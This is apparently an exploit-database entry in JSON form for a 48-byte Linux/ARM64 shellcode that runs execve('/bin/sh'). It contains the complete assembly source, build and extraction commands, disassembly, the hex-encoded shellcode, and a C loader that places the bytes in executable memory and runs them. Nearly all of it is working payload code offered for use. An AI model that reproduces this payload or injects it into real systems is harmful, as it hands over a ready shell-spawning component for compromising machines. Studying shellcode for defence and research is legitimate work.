DATABASE RESOURCES PRICING ABOUT US

{"id": "1337DAY-ID-32923", "vendorId": null, "type": "zdt", "bulletinFamily": "exploit", "title": "Linux/ARM64 - execve(/bin/sh, [/bin/sh], NULL) Shellcode (48 Bytes)", "description": "", "published": "2019-07-01T00:00:00", "modified": "2019-07-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/32923", "reporter": "Ken Kitahara", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2023-03-13T20:54:16", "viewCount": 132, "enchantments": {"dependencies": {}, "score": {"value": -0.2, "vector": "NONE"}, "backreferences": {}, "exploitation": null, "vulnersScore": -0.2}, "_state": {"dependencies": 1678740900, "score": 1678741110, "epss": 1678879025}, "_internal": {"score_hash": "656ff73f925efaeba34fa40b58220edd"}, "sourceHref": "https://0day.today/exploit/32923", "sourceData": "/*\n# Title: Linux/ARM64 - execve(\"/bin/sh\", [\"/bin/sh\"], NULL) Shellcode (48 Bytes)\n# Date: 2019-06-30\n# Tested: Ubuntu 16.04 (aarch64)\n# Author: Ken Kitahara\n# Compilation: gcc -o loader loader.c\n\n\n[email\u00a0protected]:~/works$ lsb_release -a\nNo LSB modules are available.\nDistributor ID:\tUbuntu\nDescription:\tUbuntu Xenial Xerus (development branch)\nRelease:\t16.04\nCodename:\txenial\n[email\u00a0protected]:~/works$ uname -a\nLinux ubuntu 4.2.0-16-generic #19-Ubuntu SMP Thu Oct 8 15:00:45 UTC 2015 aarch64 aarch64 aarch64 GNU/Linux\n[email\u00a0protected]:~/works$ cat execve2.s\n.section .text\n.global _start\n_start:\n // execve(\"/bin/sh\", [\"/bin/sh\"], NULL)\n mov x1, #0x622F // x1 = 0x000000000000622F (\"b/\")\n movk x1, #0x6E69, lsl #16 // x1 = 0x000000006E69622F (\"nib/\")\n movk x1, #0x732F, lsl #32 // x1 = 0x0000732F6E69622F (\"s/nib/\")\n movk x1, #0x68, lsl #48 // x1 = 0x0068732F6E69622F (\"hs/nib/\")\n str x1, [sp, #-8]! // push x1\n mov x2, xzr // args[2] = x2 = NULL\n add x0, sp, x2 // args[0] = x0 = pointer to \"/bin/sh\\0\"\n str x2, [sp, #-8]! // push x2\n str x0, [sp, #-8]! // push x0\n add x1, sp, x2 // args[1] = x1 = [\"/bin/sh\", NULL]\n mov x8, #221 // Systemcall Number = 221 (execve)\n svc #0x1337 // Invoke Systemcall\n[email\u00a0protected]:~/works$ as -o execve2.o execve2.s && ld -o execve2 execve2.o\n[email\u00a0protected]:~/works$ objdump -d ./execve2\n\n./execve2: file format elf64-littleaarch64\n\n\nDisassembly of section .text:\n\n0000000000400078 <_start>:\n 400078:\td28c45e1 \tmov\tx1, #0x622f \t// #25135\n 40007c:\tf2adcd21 \tmovk\tx1, #0x6e69, lsl #16\n 400080:\tf2ce65e1 \tmovk\tx1, #0x732f, lsl #32\n 400084:\tf2e00d01 \tmovk\tx1, #0x68, lsl #48\n 400088:\tf81f8fe1 \tstr\tx1, [sp,#-8]!\n 40008c:\taa1f03e2 \tmov\tx2, xzr\n 400090:\t8b2263e0 \tadd\tx0, sp, x2\n 400094:\tf81f8fe2 \tstr\tx2, [sp,#-8]!\n 400098:\tf81f8fe0 \tstr\tx0, [sp,#-8]!\n 40009c:\t8b2263e1 \tadd\tx1, sp, x2\n 4000a0:\td2801ba8 \tmov\tx8, #0xdd \t// #221\n 4000a4:\td40266e1 \tsvc\t#0x1337\n[email\u00a0protected]:~/works$ objcopy -O binary execve2 execve2.bin\n[email\u00a0protected]:~/works$ hexdump -v -e '\"\\\\\"\"x\" 1/1 \"%02x\" \"\"' execve2.bin && echo\n\\xe1\\x45\\x8c\\xd2\\x21\\xcd\\xad\\xf2\\xe1\\x65\\xce\\xf2\\x01\\x0d\\xe0\\xf2\\xe1\\x8f\\x1f\\xf8\\xe2\\x03\\x1f\\xaa\\xe0\\x63\\x22\\x8b\\xe2\\x8f\\x1f\\xf8\\xe0\\x8f\\x1f\\xf8\\xe1\\x63\\x22\\x8b\\xa8\\x1b\\x80\\xd2\\xe1\\x66\\x02\\xd4\n\n*/\n\n#include <stdio.h>\n#include <sys/mman.h>\n#include <string.h>\n#include <stdlib.h>\n\nint (*sc)();\n\nchar shellcode[] =\n\"\\xe1\\x45\\x8c\\xd2\\x21\\xcd\\xad\\xf2\\xe1\\x65\\xce\\xf2\\x01\\x0d\\xe0\\xf2\"\n\"\\xe1\\x8f\\x1f\\xf8\\xe2\\x03\\x1f\\xaa\\xe0\\x63\\x22\\x8b\\xe2\\x8f\\x1f\\xf8\"\n\"\\xe0\\x8f\\x1f\\xf8\\xe1\\x63\\x22\\x8b\\xa8\\x1b\\x80\\xd2\\xe1\\x66\\x02\\xd4\";\n\nint main(int argc, char **argv) {\n printf(\"Shellcode Length: %zd Bytes\\n\", strlen(shellcode));\n\n void *ptr = mmap(0, 0x100, PROT_EXEC | PROT_WRITE | PROT_READ, MAP_ANON | MAP_PRIVATE, -1, 0);\n\n if (ptr == MAP_FAILED) {\n perror(\"mmap\");\n exit(-1);\n }\n\n memcpy(ptr, shellcode, sizeof(shellcode));\n sc = ptr;\n\n sc();\n\n return 0;\n}\n", "category": "shellcode", "verified": true}

{}